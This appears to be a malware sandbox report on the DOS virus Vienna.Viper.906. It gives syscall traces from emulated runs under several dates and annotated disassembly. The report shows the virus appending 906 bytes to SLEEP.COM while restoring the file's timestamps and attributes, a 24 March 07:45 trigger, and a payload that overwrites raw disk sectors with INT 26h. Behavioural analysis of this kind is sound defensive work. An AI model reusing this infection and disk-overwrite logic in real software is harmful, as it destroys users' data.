Sample viewer

vx.netlux.org/Virus.DOS.Vienna.Viper.906


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:01.717029794Z 255 PC: 12a49 | UNKNOWN!
2018-12-17T23:10:01.719611506Z 48 PC: 12a68 | Get DOS version
2018-12-17T23:10:01.721432328Z 44 PC: 12a74 | Get time 0x12a74: xor bx, bx
; Disassembly window starting at the return address of the "Get time" call
; logged on the preceding line. It appears to be a linear listing (both sides
; of each branch are shown), so not every instruction here was executed.
; BX was zeroed at 0x12a74 (preceding line) and is the string index below.
0x12a76: cmp dl, 4                          ; DL = hundredths of a second from Get time (AH=2Ch)
0x12a79: jle 0x12a7d                        ; DL <= 4: fall into the message loop
0x12a7b: jmp 0x12a8f                        ; otherwise skip the message
0x12a7d: mov dl, byte ptr [bx + si + 0x8f]  ; next encoded byte of the string at SI+0x8f
0x12a81: or dl, dl                          ; a zero byte terminates the string
0x12a83: je 0x12a8f
0x12a85: sub dl, 0x4b                       ; decode: each stored byte is the character + 0x4b
0x12a88: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to stdout
0x12a8a: int 0x21
0x12a8c: inc bx                             ; advance to the next string byte
0x12a8d: jmp 0x12a7d
0x12a8f: mov ah, 0x2a                       ; INT 21h AH=2Ah: get system date (DH = month, DL = day)
0x12a91: int 0x21
0x12a93: cmp dh, 3                          ; date trigger, part 1: month must be 3 (March)
0x12a96: jne 0x12ad8                        ; no match: continue at 0x12ad8 (outside this window)
0x12a98: cmp dl, 0x18                       ; date trigger, part 2: day must be 0x18 = 24
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c                       ; date matched: INT 21h AH=2Ch, get time for the next check
0x12a9f: int 0x21
2018-12-17T23:10:01.724392301Z 42 PC: 12a93 | Get date 0x12a93: cmp dh, 3
; Disassembly window starting at the return address of the "Get date" call
; logged on the preceding line (its first instruction, cmp dh, 3, is on that
; line). It appears to be a linear listing, so not every instruction here ran.
; Trigger shown: system date 24 March and system time 07:45.
0x12a96: jne 0x12ad8                        ; month (DH) != 3: skip to 0x12ad8 (outside this window)
0x12a98: cmp dl, 0x18                       ; day must be 0x18 = 24
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c                       ; INT 21h AH=2Ch: get system time (CH = hour, CL = minute)
0x12a9f: int 0x21
0x12aa1: cmp ch, 7                          ; hour must be 7
0x12aa4: jne 0x12ad8
0x12aa6: cmp cl, 0x2d                       ; minute must be 0x2d = 45
0x12aa9: jne 0x12ad8
0x12aab: xor bx, bx                         ; BX = 0: index into the second string
0x12aad: mov dl, byte ptr [bx + si + 0xf1]  ; next encoded byte of the string at SI+0xf1
0x12ab1: or dl, dl                          ; a zero byte terminates the string
0x12ab3: je 0x12abf
0x12ab5: sub dl, 0x4b                       ; decode: each stored byte is the character + 0x4b
0x12ab8: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to stdout
0x12aba: int 0x21
0x12abc: inc bx
0x12abd: jmp 0x12aad
0x12abf: mov al, 0                          ; window ends here; the longer window from 0x12aa1 on this page shows AL feeding INT 26h
2018-12-17T23:10:01.727236366Z 47 PC: 12add | Get disk transfer address
2018-12-17T23:10:01.730352522Z 26 PC: 12aee | Set disk transfer address
2018-12-17T23:10:01.732188603Z 78 PC: 12b77 | Find first file
2018-12-17T23:10:01.739928309Z 67 PC: 12bb3 | Get or set file attributes
2018-12-17T23:10:01.748284442Z 67 PC: 12bc5 | Get or set file attributes
2018-12-17T23:10:01.765788619Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:10:01.773729062Z 87 PC: 12bde | Get or set file date and time
2018-12-17T23:10:01.776615646Z 63 PC: 12bf2 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:10:01.78438617Z 66 PC: 12c03 | Move file pointer
2018-12-17T23:10:01.786088699Z 64 PC: 12c29 | Write file or device (Write 906 bytes on handle 5)
2018-12-17T23:10:01.796501108Z 66 PC: 12c3a | Move file pointer
2018-12-17T23:10:01.798679592Z 64 PC: 12c4a | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:10:01.807007383Z 87 PC: 12c5e | Get or set file date and time
2018-12-17T23:10:01.809607229Z 62 PC: 12c63 | Close file
2018-12-17T23:10:01.824437029Z 67 PC: 12c72 | Get or set file attributes
2018-12-17T23:10:01.840456094Z 26 PC: 12c7e | Set disk transfer address

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16727,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:38.313005333Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:38.321092092Z 48 PC: 12a68 | Get DOS version
2018-12-25T12:53:38.322175529Z 44 PC: 12a74 | Get time 0x12a74: xor bx, bx
; Disassembly window starting at the return address of the "Get time" call
; logged on the preceding line. It appears to be a linear listing (both sides
; of each branch are shown), so not every instruction here was executed.
; BX was zeroed at 0x12a74 (preceding line) and is the string index below.
0x12a76: cmp dl, 4                          ; DL = hundredths of a second from Get time (AH=2Ch)
0x12a79: jle 0x12a7d                        ; DL <= 4: fall into the message loop
0x12a7b: jmp 0x12a8f                        ; otherwise skip the message
0x12a7d: mov dl, byte ptr [bx + si + 0x8f]  ; next encoded byte of the string at SI+0x8f
0x12a81: or dl, dl                          ; a zero byte terminates the string
0x12a83: je 0x12a8f
0x12a85: sub dl, 0x4b                       ; decode: each stored byte is the character + 0x4b
0x12a88: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to stdout
0x12a8a: int 0x21
0x12a8c: inc bx                             ; advance to the next string byte
0x12a8d: jmp 0x12a7d
0x12a8f: mov ah, 0x2a                       ; INT 21h AH=2Ah: get system date (DH = month, DL = day)
0x12a91: int 0x21
0x12a93: cmp dh, 3                          ; date trigger, part 1: month must be 3 (March)
0x12a96: jne 0x12ad8                        ; no match: continue at 0x12ad8 (outside this window)
0x12a98: cmp dl, 0x18                       ; date trigger, part 2: day must be 0x18 = 24
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c                       ; date matched: INT 21h AH=2Ch, get time for the next check
0x12a9f: int 0x21
2018-12-25T12:53:38.324147134Z 42 PC: 12a93 | Get date 0x12a93: cmp dh, 3
; Disassembly window starting at the return address of the "Get date" call
; logged on the preceding line (its first instruction, cmp dh, 3, is on that
; line). It appears to be a linear listing, so not every instruction here ran.
; Trigger shown: system date 24 March and system time 07:45.
0x12a96: jne 0x12ad8                        ; month (DH) != 3: skip to 0x12ad8 (outside this window)
0x12a98: cmp dl, 0x18                       ; day must be 0x18 = 24
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c                       ; INT 21h AH=2Ch: get system time (CH = hour, CL = minute)
0x12a9f: int 0x21
0x12aa1: cmp ch, 7                          ; hour must be 7
0x12aa4: jne 0x12ad8
0x12aa6: cmp cl, 0x2d                       ; minute must be 0x2d = 45
0x12aa9: jne 0x12ad8
0x12aab: xor bx, bx                         ; BX = 0: index into the second string
0x12aad: mov dl, byte ptr [bx + si + 0xf1]  ; next encoded byte of the string at SI+0xf1
0x12ab1: or dl, dl                          ; a zero byte terminates the string
0x12ab3: je 0x12abf
0x12ab5: sub dl, 0x4b                       ; decode: each stored byte is the character + 0x4b
0x12ab8: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to stdout
0x12aba: int 0x21
0x12abc: inc bx
0x12abd: jmp 0x12aad
0x12abf: mov al, 0                          ; window ends here; the longer window from 0x12aa1 on this page shows AL feeding INT 26h
2018-12-25T12:53:38.331837728Z 47 PC: 12add | Get disk transfer address
2018-12-25T12:53:38.333103262Z 26 PC: 12aee | Set disk transfer address
2018-12-25T12:53:38.334136065Z 78 PC: 12b77 | Find first file
2018-12-25T12:53:38.340093133Z 67 PC: 12bb3 | Get or set file attributes
2018-12-25T12:53:38.345655709Z 67 PC: 12bc5 | Get or set file attributes
2018-12-25T12:53:38.361096341Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:38.367337392Z 87 PC: 12bde | Get or set file date and time
2018-12-25T12:53:38.369083164Z 63 PC: 12bf2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:38.375566233Z 66 PC: 12c03 | Move file pointer
2018-12-25T12:53:38.377085515Z 64 PC: 12c29 | Write file or device (Write 906 bytes on handle 5)
2018-12-25T12:53:38.38620503Z 66 PC: 12c3a | Move file pointer
2018-12-25T12:53:38.387482797Z 64 PC: 12c4a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:38.39404069Z 87 PC: 12c5e | Get or set file date and time
2018-12-25T12:53:38.404332873Z 62 PC: 12c63 | Close file
2018-12-25T12:53:38.412013307Z 67 PC: 12c72 | Get or set file attributes
2018-12-25T12:53:38.421624913Z 26 PC: 12c7e | Set disk transfer address

{"DateBased":true,"Day":1,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16727,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:38.48132398Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:38.483051617Z 48 PC: 12a68 | Get DOS version
2018-12-25T12:53:38.48413763Z 44 PC: 12a74 | Get time 0x12a74: xor bx, bx
; Disassembly window starting at the return address of the "Get time" call
; logged on the preceding line. It appears to be a linear listing (both sides
; of each branch are shown), so not every instruction here was executed.
; BX was zeroed at 0x12a74 (preceding line) and is the string index below.
0x12a76: cmp dl, 4                          ; DL = hundredths of a second from Get time (AH=2Ch)
0x12a79: jle 0x12a7d                        ; DL <= 4: fall into the message loop
0x12a7b: jmp 0x12a8f                        ; otherwise skip the message
0x12a7d: mov dl, byte ptr [bx + si + 0x8f]  ; next encoded byte of the string at SI+0x8f
0x12a81: or dl, dl                          ; a zero byte terminates the string
0x12a83: je 0x12a8f
0x12a85: sub dl, 0x4b                       ; decode: each stored byte is the character + 0x4b
0x12a88: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to stdout
0x12a8a: int 0x21
0x12a8c: inc bx                             ; advance to the next string byte
0x12a8d: jmp 0x12a7d
0x12a8f: mov ah, 0x2a                       ; INT 21h AH=2Ah: get system date (DH = month, DL = day)
0x12a91: int 0x21
0x12a93: cmp dh, 3                          ; date trigger, part 1: month must be 3 (March)
0x12a96: jne 0x12ad8                        ; no match: continue at 0x12ad8 (outside this window)
0x12a98: cmp dl, 0x18                       ; date trigger, part 2: day must be 0x18 = 24
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c                       ; date matched: INT 21h AH=2Ch, get time for the next check
0x12a9f: int 0x21
2018-12-25T12:53:38.486097307Z 42 PC: 12a93 | Get date 0x12a93: cmp dh, 3
; Disassembly window starting at the return address of the "Get date" call
; logged on the preceding line (its first instruction, cmp dh, 3, is on that
; line). It appears to be a linear listing, so not every instruction here ran.
; Trigger shown: system date 24 March and system time 07:45.
0x12a96: jne 0x12ad8                        ; month (DH) != 3: skip to 0x12ad8 (outside this window)
0x12a98: cmp dl, 0x18                       ; day must be 0x18 = 24
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c                       ; INT 21h AH=2Ch: get system time (CH = hour, CL = minute)
0x12a9f: int 0x21
0x12aa1: cmp ch, 7                          ; hour must be 7
0x12aa4: jne 0x12ad8
0x12aa6: cmp cl, 0x2d                       ; minute must be 0x2d = 45
0x12aa9: jne 0x12ad8
0x12aab: xor bx, bx                         ; BX = 0: index into the second string
0x12aad: mov dl, byte ptr [bx + si + 0xf1]  ; next encoded byte of the string at SI+0xf1
0x12ab1: or dl, dl                          ; a zero byte terminates the string
0x12ab3: je 0x12abf
0x12ab5: sub dl, 0x4b                       ; decode: each stored byte is the character + 0x4b
0x12ab8: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to stdout
0x12aba: int 0x21
0x12abc: inc bx
0x12abd: jmp 0x12aad
0x12abf: mov al, 0                          ; window ends here; the longer window from 0x12aa1 on this page shows AL feeding INT 26h
2018-12-25T12:53:38.488226164Z 47 PC: 12add | Get disk transfer address
2018-12-25T12:53:38.48958885Z 26 PC: 12aee | Set disk transfer address
2018-12-25T12:53:38.490624768Z 78 PC: 12b77 | Find first file
2018-12-25T12:53:38.49637149Z 67 PC: 12bb3 | Get or set file attributes
2018-12-25T12:53:38.502895975Z 67 PC: 12bc5 | Get or set file attributes
2018-12-25T12:53:38.520974779Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:38.533079903Z 87 PC: 12bde | Get or set file date and time
2018-12-25T12:53:38.53552932Z 63 PC: 12bf2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:38.541583219Z 66 PC: 12c03 | Move file pointer
2018-12-25T12:53:38.542861335Z 64 PC: 12c29 | Write file or device (Write 906 bytes on handle 5)
2018-12-25T12:53:38.551740335Z 66 PC: 12c3a | Move file pointer
2018-12-25T12:53:38.553036646Z 64 PC: 12c4a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:38.560150479Z 87 PC: 12c5e | Get or set file date and time
2018-12-25T12:53:38.562202727Z 62 PC: 12c63 | Close file
2018-12-25T12:53:38.582298819Z 67 PC: 12c72 | Get or set file attributes
2018-12-25T12:53:38.592655193Z 26 PC: 12c7e | Set disk transfer address

{"DateBased":true,"Day":24,"Month":3,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":16727,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:53:38.571790279Z 255 PC: 12a49 | UNKNOWN!
2018-12-25T12:53:38.572912371Z 48 PC: 12a68 | Get DOS version
2018-12-25T12:53:38.574415932Z 44 PC: 12a74 | Get time 0x12a74: xor bx, bx
; Disassembly window starting at the return address of the "Get time" call
; logged on the preceding line. It appears to be a linear listing (both sides
; of each branch are shown), so not every instruction here was executed.
; BX was zeroed at 0x12a74 (preceding line) and is the string index below.
0x12a76: cmp dl, 4                          ; DL = hundredths of a second from Get time (AH=2Ch)
0x12a79: jle 0x12a7d                        ; DL <= 4: fall into the message loop
0x12a7b: jmp 0x12a8f                        ; otherwise skip the message
0x12a7d: mov dl, byte ptr [bx + si + 0x8f]  ; next encoded byte of the string at SI+0x8f
0x12a81: or dl, dl                          ; a zero byte terminates the string
0x12a83: je 0x12a8f
0x12a85: sub dl, 0x4b                       ; decode: each stored byte is the character + 0x4b
0x12a88: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to stdout
0x12a8a: int 0x21
0x12a8c: inc bx                             ; advance to the next string byte
0x12a8d: jmp 0x12a7d
0x12a8f: mov ah, 0x2a                       ; INT 21h AH=2Ah: get system date (DH = month, DL = day)
0x12a91: int 0x21
0x12a93: cmp dh, 3                          ; date trigger, part 1: month must be 3 (March)
0x12a96: jne 0x12ad8                        ; no match: continue at 0x12ad8 (outside this window)
0x12a98: cmp dl, 0x18                       ; date trigger, part 2: day must be 0x18 = 24
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c                       ; date matched: INT 21h AH=2Ch, get time for the next check
0x12a9f: int 0x21
2018-12-25T12:53:38.576665855Z 42 PC: 12a93 | Get date 0x12a93: cmp dh, 3
; Disassembly window starting at the return address of the "Get date" call
; logged on the preceding line (its first instruction, cmp dh, 3, is on that
; line). It appears to be a linear listing, so not every instruction here ran.
; Trigger shown: system date 24 March and system time 07:45.
0x12a96: jne 0x12ad8                        ; month (DH) != 3: skip to 0x12ad8 (outside this window)
0x12a98: cmp dl, 0x18                       ; day must be 0x18 = 24
0x12a9b: jne 0x12ad8
0x12a9d: mov ah, 0x2c                       ; INT 21h AH=2Ch: get system time (CH = hour, CL = minute)
0x12a9f: int 0x21
0x12aa1: cmp ch, 7                          ; hour must be 7
0x12aa4: jne 0x12ad8
0x12aa6: cmp cl, 0x2d                       ; minute must be 0x2d = 45
0x12aa9: jne 0x12ad8
0x12aab: xor bx, bx                         ; BX = 0: index into the second string
0x12aad: mov dl, byte ptr [bx + si + 0xf1]  ; next encoded byte of the string at SI+0xf1
0x12ab1: or dl, dl                          ; a zero byte terminates the string
0x12ab3: je 0x12abf
0x12ab5: sub dl, 0x4b                       ; decode: each stored byte is the character + 0x4b
0x12ab8: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to stdout
0x12aba: int 0x21
0x12abc: inc bx
0x12abd: jmp 0x12aad
0x12abf: mov al, 0                          ; window ends here; the longer window from 0x12aa1 on this page shows AL feeding INT 26h
2018-12-25T12:53:38.578991667Z 44 PC: 12aa1 | Get time 0x12aa1: cmp ch, 7
; Disassembly window starting at the return address of the second "Get time"
; call, which is only reached once the date check (24 March) has passed. Its
; first instruction, cmp ch, 7, is on the preceding line. The listing appears
; to be linear, so the instructions below the time check are shown whether or
; not they ran.
; Analyst note: INT 26h (DOS absolute disk write) issued by a .COM program is
; the destructive payload here and a strong behavioural indicator on its own.
0x12aa4: jne 0x12ad8                        ; hour (CH) != 7: skip the payload (0x12ad8 is outside this window)
0x12aa6: cmp cl, 0x2d                       ; minute must be 0x2d = 45
0x12aa9: jne 0x12ad8
0x12aab: xor bx, bx                         ; BX = 0: index into the second string
0x12aad: mov dl, byte ptr [bx + si + 0xf1]  ; next encoded byte of the string at SI+0xf1
0x12ab1: or dl, dl                          ; a zero byte terminates the string
0x12ab3: je 0x12abf
0x12ab5: sub dl, 0x4b                       ; decode: each stored byte is the character + 0x4b
0x12ab8: mov ah, 2                          ; INT 21h AH=02h: write the character in DL to stdout
0x12aba: int 0x21
0x12abc: inc bx
0x12abd: jmp 0x12aad
0x12abf: mov al, 0                          ; AL = drive number for INT 26h (0 = A:)
0x12ac1: mov cx, 0xff                       ; CX = number of sectors to write (255)
0x12ac4: mov dx, 1                          ; DX = first logical sector to write
0x12ac7: int 0x26                           ; absolute disk write: raw sectors, bypassing the file system
0x12ac9: jb 0x12ace                         ; carry set = write failed
0x12acb: add sp, 2                          ; INT 26h returns with a flags word left on the stack; drop it
0x12ace: inc al                             ; next drive number; presumably loops to the next drive, not visible here
2018-12-25T12:53:38.584306525Z 47 PC: 12add | Get disk transfer address
2018-12-25T12:53:38.585565162Z 26 PC: 12aee | Set disk transfer address
2018-12-25T12:53:38.587067339Z 78 PC: 12b77 | Find first file
2018-12-25T12:53:38.595023845Z 67 PC: 12bb3 | Get or set file attributes
2018-12-25T12:53:38.602057235Z 67 PC: 12bc5 | Get or set file attributes
2018-12-25T12:53:38.620636653Z 61 PC: 12bd1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:53:38.628488439Z 87 PC: 12bde | Get or set file date and time
2018-12-25T12:53:38.630060802Z 63 PC: 12bf2 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:53:38.637174628Z 66 PC: 12c03 | Move file pointer
2018-12-25T12:53:38.639059171Z 64 PC: 12c29 | Write file or device (Write 906 bytes on handle 5)
2018-12-25T12:53:38.648597068Z 66 PC: 12c3a | Move file pointer
2018-12-25T12:53:38.650446848Z 64 PC: 12c4a | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:53:38.658017153Z 87 PC: 12c5e | Get or set file date and time
2018-12-25T12:53:38.659220259Z 62 PC: 12c63 | Close file
2018-12-25T12:53:38.667766838Z 67 PC: 12c72 | Get or set file attributes
2018-12-25T12:53:38.67955054Z 26 PC: 12c7e | Set disk transfer address